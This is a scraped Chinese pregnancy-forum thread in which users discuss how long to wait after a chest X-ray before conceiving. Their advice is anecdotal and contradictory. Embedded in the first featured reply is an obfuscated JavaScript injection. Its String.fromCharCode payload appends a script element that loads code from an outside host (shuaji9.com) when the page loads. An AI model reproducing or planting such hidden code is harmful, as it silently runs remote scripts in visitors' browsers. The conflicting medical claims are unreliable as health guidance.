帖子详情

胸部正位片会不会影响备孕的啊?

2542629准备怀孕

精选回帖
$('ed2k_1i4').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+' Bytes)';胸片一般没有什么影响的,我怀孕的时候还拍过一次
2017/03/07回复
1月份婚检做胸透,民政局抽血那个护士说要不要去做胸透,做了说半年内不可以怀孕,我想着反正免费就去了,然后去到照完问医生,医生说来一次月经就可以怀了,不用这么久。所以我都不知信哪个!
2017/03/09回复
bugmyobugmyo15楼
受卵日前照的都应该无问题吧。我10月8号照的胸透,11月初怀上的,医生说没问题的,而且我现在5个多月,暂时是各种检查都很正常。。。
lgrlpzlgrlpz17楼
mr是核磁共振,幅射比x光微小很多,孕妇也能照,只是为了安全,孕0-3个月最好别照😄
2017/03/10回复
全部回帖
曳丹猪:
过年因为咳嗽,照了个胸片,要多久才能备孕啊?今年想要二胎呢
查看原文
您好,请问是什么时候照的呢?
不孕不育医师郭仲杰:
您好,请问是什么时候照的呢?
查看原文
您好,郭医生,我是2月初照的
曳丹猪:
您好,郭医生,我是2月初照的
查看原文
您好,您做的胸部正位片,放射量是比较小的,现在都过了一个多月了,影响不会很大。
最好半年后再计划
不孕不育医师郭仲杰:
您好,您做的胸部正位片,放射量是比较小的,现在都过了一个多月了,影响不会很大。
查看原文
感谢回复,谢谢郭医生
影雪儿:
最好半年后再计划
查看原文
是哦,谢谢你的提醒

胸片一般没有什么影响的,我怀孕的时候还拍过一次
我也是这样,问过医生,说两三个月就可以了
1月份婚检做胸透,民政局抽血那个护士说要不要去做胸透,做了说半年内不可以怀孕,我想着反正免费就去了,然后去到照完问医生,医生说来一次月经就可以怀了,不用这么久。所以我都不知信哪个!
没事的,胸部平扫,辐射剂量很低的
有辐射的,备孕期或者说孕前六个月最好不要照
我同事之前是今个月照了,下个月就怀上了,一样健康可爱。
bugmyobugmyo14楼
受卵日前照的都应该无问题吧。我10月8号照的胸透,11月初怀上的,医生说没问题的,而且我现在5个多月,暂时是各种检查都很正常。。。
胸片只是x光吧,很小影响的,不同ct,mr那些,那些真的是最小三个月
lgrlpzlgrlpz16楼
啊啊啊翻译:
胸片只是x光吧,很小影响的,不同ct,mr那些,那些真的是最小三个月
查看原文
mr是核磁共振,幅射比x光微小很多,孕妇也能照,只是为了安全,孕0-3个月最好别照😄
lgrlpzlgrlpz17楼
细胞的恢复能力很好的,来一次月经可以了
至少半年
bugmyo:
查看原文
哇,你胆子可不小呢?我都会怕怕呢
猜你喜欢

[2017备孕日记]~期盼着咱家的二宝宝

【2017备孕日记】30+二宝妈妈在努力中

备孕的姐妹们,过年打算去拜拜吗?

请了送子观音如愿了,希望把好孕传给备孕的姐妹们

我的备孕食疗~大家进来交流下~

准备二胎自缴社保要在备孕前多久开始缴纳

热点推荐

高考倒计时一个月 你还记得当年的成绩吗

逛粤海天河城商场 发现养眼花海

这家店自助取朱古力豆 太有趣啦

楼下附近新开的平价生鲜 比某大妈还便

2024广州孕妈妈交流群 欢迎扫码入群!

装修必看干货,瓷砖选购有技巧!

晚餐粥旺庄烧肉很嫩脆 还送红糖糕

又褥到羊毛啦!直接0元领取轻养茶

传统饼店出品 鸡仔饼正宗到没朋友!

勿理堂的蝴蝶酥9.9一袋 松脆好吃

香煎马鲛鱼腥味也不重 送粥送饭都好搭

阿强家优惠来袭 开业赠送500元大礼包

来黄埔古港听名人故事 玩游戏领奖品

查看更多热点 >